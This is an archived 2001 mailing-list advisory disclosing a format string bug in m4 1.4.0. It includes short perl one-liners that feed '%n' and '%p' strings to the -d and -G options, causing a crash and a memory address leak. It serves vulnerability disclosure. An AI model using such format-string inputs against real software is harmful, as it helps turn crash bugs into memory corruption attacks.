Vulnerability Development mailing list archives
[Helios Security and Administration::another bug in m4]
From: honoriak <EGC () ARGEN NET>
Date: Thu, 22 Feb 2001 18:12:18 +0100
[Helios Security and Administration]
- Program: m4-1.4.0
- Vulnerability: format string bug
- Details: Another format string buf in m4 1.4.0.
This time is with -d option, another exists in -G option.
In a few days you can see proof of concept exploit, and we
explain the part of the code that permits this.
- Risk: Low (Nothing). It's not setuid. It's useless but it's a vulnerability of course.
- Example:
$ m4 -d "`perl -e 'print " %n"x3'`"
m4: Segmentation fault (core dumped)
$ m4 -G "`perl -e 'print " %p"x4'`"
m4: 0x4010848c 0x4000a610 0xbffffc14 0xbffffbe8: No such file or directory
signed,
-honoriak
--
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 6.5.1
mQGiBDpPJL4RBADgD/upBcXggrXgXgXLs17zo7gE3YFCXADp7AcEuJZIBnFF/55w
x1pLiyMOpgyldEpFJqodNBwz6hEw1Kc9GhbcJpeEdi/lcSpPBcLh4g75djBR2x3C
sZhhvUDAladrmFQNQJN7bp1LfITM/c9arjM0L7wvy71JIjG4DLZomJvljwCg/1kd
t4kVbLeOgCrdISCAdQUWKz0D/2w8U6CPKQkI2mt7phhBru6YX0BUBlAEVdQSfSZX
5ps01QTsLr3Z46GbYsLZu4bZNqE1NzuM0SgKp6G727v5sSOqPOGIdPMI0wkXhRyg
aNru3DEDAV1JrVS6EnzbcPibKddTUBM2U+0zXGuOOphBIqqZZc/7HkP77hRbgkh2
N+yqBADfXpNgiWf1jfFx8whaj6axAf8oNT1wYjpeMOtQZ/izRHAzG/FFpYzGR8j8
Q6BGW+4vtaMAs/VMlGJLUdtZTCaMRAuqtk0dC61Pq5YZNNRctoOrBltXFdKtov8g
dI1PyNX14u9y31PVG4hCsrO6aMOI/I2C9GtkVaMNB6rXEB0ck7QbaG9ub3JpYWsg
PGhvbm9yaWFrQG1haWwucnU+iQBOBBARAgAOBQI6TyS+BAsDAQICGQEACgkQhT2y
uAitIupxJACeMw/biJGU58Xz/C5uTRJw+3AafBUAoJnNA33uPYpFW6Cl/0NfM6o8
p7VDuQMNBDpPJMsQDADMHXdXJDhK4sTw6I4TZ5dOkhNh9tvrJQ4X/faY98h8ebBy
HTh1+/bBc8SDESYrQ2DD4+jWCv2hKCYLrqmus2UPogBTAaB81qujEh76DyrOH3SE
T8rzF/OkQOnX0ne2Qi0CNsEmy2henXyYCQqNfi3t5F159dSST5sYjvwqp0t8MvZC
V7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8b
Current thread:
- [Helios Security and Administration::another bug in m4] honoriak (Feb 22)
- Re: [Helios Security and Administration::another bug in m4] Knud Erik Hojgaard - CyberCity Support (Feb 23)
- Re: [Helios Security and Administration::another bug in m4] Colin Phipps (Feb 23)